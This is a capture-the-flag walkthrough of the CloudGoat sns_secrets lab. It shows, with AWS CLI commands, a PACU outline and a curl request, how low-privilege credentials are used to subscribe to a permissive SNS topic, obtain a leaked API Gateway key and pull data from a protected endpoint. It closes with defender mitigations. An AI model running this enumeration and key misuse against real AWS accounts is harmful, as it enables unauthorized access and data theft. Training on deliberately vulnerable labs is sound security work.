This walkthrough covers the CloudGoat scenario sns_secrets: a misconfigured SNS topic leaks an API Gateway key, which then unlocks a protected endpoint that returns sensitive data.
I approached it in two ways:
- Manual enumeration with AWS CLI (best visibility into each step).
- Automation with PACU (faster path once credentials are loaded).
Lab safety: Commands and output below use redacted placeholders. Never publish real AWS keys, tokens, API keys, or personal emails from live environments.
What is Amazon SNS?
Amazon SNS (Simple Notification Service) is a pub/sub messaging service. A publisher sends to a topic, then SNS fans out messages to subscribers (email, HTTPS, Lambda, SQS, and more).
In this scenario, the issue is not SNS itself; the issue is policy configuration. If a topic allows broad or public subscription, sensitive notifications can leak to unauthorized recipients.
What is API Gateway?
Amazon API Gateway is an entry point for APIs. It can enforce authentication, API keys, usage plans, and route traffic to backends such as Lambda, EC2, or mock integrations.
If API keys are exposed and endpoint discovery is easy, attackers can enumerate stages and resources, then pull sensitive responses from otherwise protected routes.
Detailed steps
Initial access
Start with low-privileged IAM credentials from the scenario output (values below are placeholders):
sns_user_access_key_id = AKIA****************
sns_user_secret_access_key = ********************************
Configure these in a named profile:
aws configure --profile sns-user
Validate identity:
aws sts get-caller-identity --profile sns-user
Enumerate SNS topics
aws sns list-topics --profile sns-user
Identify the target topic ARN, then inspect policy and attributes:
aws sns get-topic-attributes \
--topic-arn arn:aws:sns:us-east-1:<ACCOUNT_ID>:public-topic-<suffix> \
--profile sns-user
In this lab, policy permissions on the topic allow unsafe subscription behavior.
Subscribe and receive leaked key material
Subscribe an email endpoint:
aws sns subscribe \
--topic-arn arn:aws:sns:us-east-1:<ACCOUNT_ID>:public-topic-<suffix> \
--protocol email \
--notification-endpoint you@example.com \
--profile sns-user
After confirmation, SNS notifications expose an API key in debug-like output.
Enumerate API Gateway
List APIs:
aws apigateway get-rest-apis --profile sns-user
Find stage name:
aws apigateway get-stages \
--rest-api-id <REST_API_ID> \
--profile sns-user
Find resource paths and method details:
aws apigateway get-resources \
--rest-api-id <REST_API_ID> \
--embed methods \
--profile sns-user
This reveals a path like /user-data, with API key requirement enabled.
Access the endpoint with the leaked API key
Build the full execute-api URL and include the key header:
curl -s \
-H "x-api-key: <LEAKED_API_KEY>" \
"https://<REST_API_ID>.execute-api.us-east-1.amazonaws.com/<STAGE_NAME>/user-data"
In this scenario, the response contains a flag and hardcoded user details.
PACU path (faster enumeration)
Using the same low-privileged key pair:
- Import credentials into PACU.
- Run
sns__enumto discover topics. - Run
sns__subscribeto register your email endpoint. - Retrieve leaked key material.
- Return to AWS CLI for API Gateway enumeration and endpoint access.
PACU speeds up discovery, but CLI output is still useful for understanding exactly what is exposed and why.
Mitigations (defender view)
- Restrict SNS topic policies: avoid wildcard principals for subscribe/receive actions.
- Classify and sanitize notifications: never include secrets, keys, or debug payloads in message content.
- Harden API Gateway exposure: use auth beyond API keys where possible, and minimize discoverable metadata.
- Review IAM permissions: reduce unnecessary read/enumeration actions for low-privilege identities.
- Detect abnormal subscriptions: monitor unexpected SNS subscriptions and alert on policy drift.
References
- CloudGoat
- Amazon SNS Documentation
- Amazon API Gateway Documentation sns_secrets-cloudgoat-api-key-exposure-via-sns-topic-subscription/)